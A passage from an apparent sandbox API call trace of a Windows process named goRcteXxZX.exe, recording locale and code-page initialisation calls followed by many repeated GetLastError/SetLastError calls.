0x0 [0031.063] SetLastError (dwErrCode=0x0) [0031.063] GetLastError () returned 0x0 [0031.063] SetLastError (dwErrCode=0x0) [0031.063] GetACP () returned 0x4e4 [0031.063] GetLastError () returned 0x0 [0031.063] SetLastError (dwErrCode=0x0) [0031.063] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.063] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f644 | out: lpCPInfo=0x22f644) returned 1 [0031.063] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f110 | out: lpCPInfo=0x22f110) returned 1 [0031.063] GetLastError () returned 0x0 [0031.063] SetLastError (dwErrCode=0x0) [0031.063] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x22f0a0 | out: lpCharType=0x22f0a0) returned 1 [0031.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f524, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f524, cbMultiByte=256, lpWideCharStr=0x22ee88, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.063] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x22f124 | out: lpCharType=0x22f124) returned 1 [0031.063] GetLastError () returned 0x0 [0031.063] SetLastError (dwErrCode=0x0) [0031.063] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f524, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f524, cbMultiByte=256, lpWideCharStr=0x22ee58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0031.064] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.064] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x22ec48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x22f424, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÜ\x0c½õ\\ö\"", lpUsedDefaultChar=0x0) returned 256 [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f524, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.064] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f524, cbMultiByte=256, lpWideCharStr=0x22ee78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0031.064] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.064] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x22ec68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x22f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÜ\x0c½õ\\ö\"", lpUsedDefaultChar=0x0) returned 256 [0031.064] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.064] SetLastError (dwErrCode=0x0) [0031.064] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.065] SetLastError (dwErrCode=0x0) [0031.065] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.066] SetLastError (dwErrCode=0x0) [0031.066] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.067] GetLastError () returned 0x0 [0031.067] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.068] SetLastError (dwErrCode=0x0) [0031.068] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.069] SetLastError (dwErrCode=0x0) [0031.069] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.070] SetLastError (dwErrCode=0x0) [0031.070] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.071] GetLastError () returned 0x0 [0031.071] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.072] SetLastError (dwErrCode=0x0) [0031.072] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.073] SetLastError (dwErrCode=0x0) [0031.073] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.074] GetLastError () returned 0x0 [0031.074] SetLastError (dwErrCode=0x0) [0031.080] GetLastError () returned 0x0 [0031.081] SetLastError (dwErrCode=0x0) [0031.081] 